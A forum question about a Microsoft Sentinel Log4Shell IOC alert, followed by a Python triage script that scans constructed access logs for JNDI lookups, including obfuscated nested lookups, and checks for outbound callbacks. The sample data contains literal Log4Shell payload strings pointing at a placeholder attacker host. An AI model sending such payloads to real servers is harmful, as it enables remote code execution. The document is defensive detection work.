"Log4j vulnerability exploit aka Log4Shell IP IOC involving one user"

Zenzele Mdakane 20 Reputation points
2025-04-15T17:19:19.45+00:00

Hi, how do we go about resolving this? (The detection rule "Log4j vulnerability exploit aka Log4Shell IP IOC involving one user" in Microsoft Sentinel identifies potential exploitation attempts of the Log4Shell vulnerability (CVE-2021-44228) by monitoring for indicators of compromise (IOCs) associated with a specific user account.) Suspicious IP address: 185.220.101.25. Will blocking the IP address, running a full AV scan, and requesting the user to change their password be the solution, or what?
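Before deciding on a response, a practitioner would want to know whether the alert is an IP-list match only, a Log4Shell payload (a `${jndi:...}` lookup string) that was merely received, or a lookup that actually executed, which is visible as the web host connecting out to the callback server named in the payload. The script below is an added triage example written for this page; it is not the logic of the Sentinel rule and not code from the question's author. The IOC IP 185.220.101.25 is taken from the question; the access-log lines, the host name web01, the outbound-connection records and the names attacker.example, canary.example and cdn.example are constructed sample data. It also handles the nested-lookup obfuscation (`${lower:j}`, `${::-j}`) commonly used to evade plain `jndi` string matching.

```python
import re

# The IOC IP named in the question; all other data below is constructed.
IOC_IPS = {"185.220.101.25"}

# Constructed "combined" access-log lines (sample data, not real traffic).
# attacker.example and canary.example are placeholder callback hosts.
ACCESS_LOGS = [
    '185.220.101.25 - - [15/Apr/2025:17:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [15/Apr/2025:17:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '185.220.101.25 - - [15/Apr/2025:17:01:09 +0000] "GET /login HTTP/1.1" 302 0 "-" "${${lower:j}ndi:rmi://attacker.example/x}"',
    '198.51.100.4 - - [15/Apr/2025:17:02:41 +0000] "POST /api HTTP/1.1" 500 33 "-" "${jndi:dns://canary.example/t}"',
]

# Constructed outbound-connection records for the web host that received the
# requests, as a firewall or flow export would give them:
# (source host, destination host, destination port).
OUTBOUND = [
    ("web01", "attacker.example", 1389),  # LDAP callback: the lookup executed
    ("web01", "cdn.example", 443),
]

_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# Nested-lookup obfuscation seen in Log4Shell payloads: ${lower:j}, ${upper:J},
# ${::-j}, ${env:NOPE:-j}. Each resolves to a single character.
_OBF = re.compile(r"\$\{(?:(?:lower|upper):([^{}])|[^{}]*:-([^{}]))\}", re.I)
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|http)\s*://"
    r"(?P<host>[^/:\s}]+)",
    re.I,
)


def deobfuscate(text):
    """Collapse nested Log4j lookups until the string stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _OBF.sub(lambda m: m.group(1) or m.group(2), text)
    return text


def find_jndi(line):
    """Return (scheme, callback host) for a JNDI lookup in the line, else None."""
    m = _JNDI.search(deobfuscate(line))
    return (m.group("scheme").lower(), m.group("host").lower()) if m else None


def triage(access_logs, outbound, ioc_ips, host="web01"):
    """Classify each suspicious request.

    ioc contact only : source IP is on the IOC list but no payload is visible
    exploit attempt  : a JNDI lookup string was received
    likely exploited : and the host then connected out to the callback host,
                       which is what separates a scan from a real hit
    """
    reached = {dst.lower() for src, dst, _port in outbound if src == host}
    findings = []
    for line in access_logs:
        m = _LINE.match(line)
        if not m:
            continue
        src_ip = m.group("ip")
        jndi = find_jndi(line)
        if src_ip not in ioc_ips and jndi is None:
            continue
        if jndi and jndi[1] in reached:
            verdict = "likely exploited"
        elif jndi:
            verdict = "exploit attempt"
        else:
            verdict = "ioc contact only"
        findings.append({
            "ts": m.group("ts"), "src_ip": src_ip, "ioc_ip": src_ip in ioc_ips,
            "request": m.group("req"), "jndi": jndi, "verdict": verdict,
        })
    return findings


if __name__ == "__main__":
    for f in triage(ACCESS_LOGS, OUTBOUND, IOC_IPS):
        print(f["verdict"], f["src_ip"], f["jndi"], f["request"])
```

On the constructed data the two requests from the IOC IP come out as "likely exploited" because web01 later connected to attacker.example, while the request from 198.51.100.4 is an "exploit attempt" from an address the IOC list does not know about. That is the point of the check: an IP block or a password reset addresses neither case, because CVE-2021-44228 is server-side code execution in the Log4j library, not a credential problem; the host that resolved the lookup needs to be treated as compromised and the vulnerable Log4j version patched.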

Microsoft Sentinel